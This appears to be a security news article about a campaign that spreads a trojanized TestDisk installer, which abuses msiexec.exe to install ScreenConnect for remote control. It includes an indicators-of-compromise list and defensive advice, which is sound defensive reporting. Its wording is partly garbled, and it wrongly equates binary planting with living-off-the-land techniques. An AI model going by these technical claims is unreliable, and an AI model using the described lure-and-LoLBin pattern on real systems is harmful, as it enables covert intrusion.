Trojanized TestDisk Installer Exploits Microsoft Binary to Deploy ScreenConnect Malware

Cybersecurity researchers have uncovered a sophisticated malware campaign in which attackers distribute a trojanized version of the open-source data recovery tool TestDisk to secretly deploy the remote access tool ScreenConnect on victims’ systems. The campaign abuses a legitimate Microsoft binary to bypass security defenses, highlighting evolving tactics in supply chain-style attacks targeting both individuals, and enterprises.

How the Attack Works

The malicious campaign begins with a fake TestDisk installer, often hosted on compromised websites or distributed via phishing emails. Once executed, the installer drops a payload that leverages msiexec.exe, a trusted Microsoft Windows binary used for installing MSI packages, to silently download and install a modified version of ScreenConnect—a legitimate remote support tool frequently abused by threat actors for persistent access.

By using msiexec.exe, attackers exploit a technique known as “binary planting” or “living-off-the-land” (LoLBins), which allows malicious activity to blend in with normal system processes, evading detection by traditional antivirus and endpoint protection platforms.

According to analysis by SC Media, the trojanized installer mimics the genuine TestDisk interface to avoid suspicion, although executing malicious code in the background. The payload establishes communication with attacker-controlled servers, enabling full remote control of the infected machine, data exfiltration, and potential lateral movement within networks.

Why TestDisk and ScreenConnect?

TestDisk is widely used by IT professionals and forensic analysts for recovering lost partitions and repairing disk structures. Its legitimacy and frequent utilize in administrative environments make it an ideal lure for targeted attacks. Similarly, ScreenConnect (now part of ConnectWise) is a trusted remote management tool, which means its presence on a system may not immediately raise alarms—especially if users believe it was installed legitimately.

This combination allows attackers to operate under the radar for extended periods, increasing the risk of data theft, credential harvesting, and ransomware deployment.

Indicators of Compromise (IoCs)

Security teams should monitor for the following signs of infection:

• Unexpected execution of TestDisk.exe from non-standard locations (e.g., %Temp%, %AppData%).
• msiexec.exe initiating network connections to unfamiliar domains or IP addresses.
• Presence of ScreenConnect client components (ScreenConnect.Client.exe, elmgine.dll) without corresponding admin approval.
• Unusual outbound traffic on ports 80, 443, or 8041 commonly associated with ScreenConnect relays.

Organizations are advised to enforce application control policies, restrict execution of msiexec.exe to trusted sources, and monitor for anomalous use of LoLBins.

Defensive Recommendations

To mitigate this threat, experts recommend the following:

• Download software only from official vendor websites or trusted repositories.
• Implement application allowlisting to block unauthorized executables.
• Enable logging and monitoring for Windows Process Creation (Event ID 4688) and CommandLine auditing.
• Use endpoint detection and response (EDR) tools capable of detecting LoLBin abuse.
• Educate users about the risks of phishing and software from unverified sources.

Organizations should also consider blocking known malicious domains and IP addresses associated with this campaign through firewall and DNS filtering policies.

Broader Implications

This incident underscores a growing trend in cybercrime: the abuse of legitimate tools and binaries to conduct stealthy attacks. As organizations improve their ability to detect malware signatures, attackers increasingly rely on living-off-the-land techniques to bypass defenses.

The use of trusted open-source tools like TestDisk as attack vectors also raises concerns about the security of software distribution channels. While TestDisk itself remains safe when obtained from its official site (cgsecurity.org), the incident highlights the need for vigilance even with well-known, reputable utilities.

Conclusion

The trojanized TestDisk installer campaign demonstrates how threat actors continue to innovate by combining social engineering, trusted software, and legitimate system binaries to evade detection. By exploiting msiexec.exe to deploy ScreenConnect, attackers gain persistent access while minimizing their footprint.

Users and administrators must remain vigilant, verify software sources, and employ layered defenses to detect and prevent such abuse of legitimate tools. As LoLBin tactics evolve, proactive monitoring and application control will be essential components of a resilient cybersecurity strategy.

Frequently Asked Questions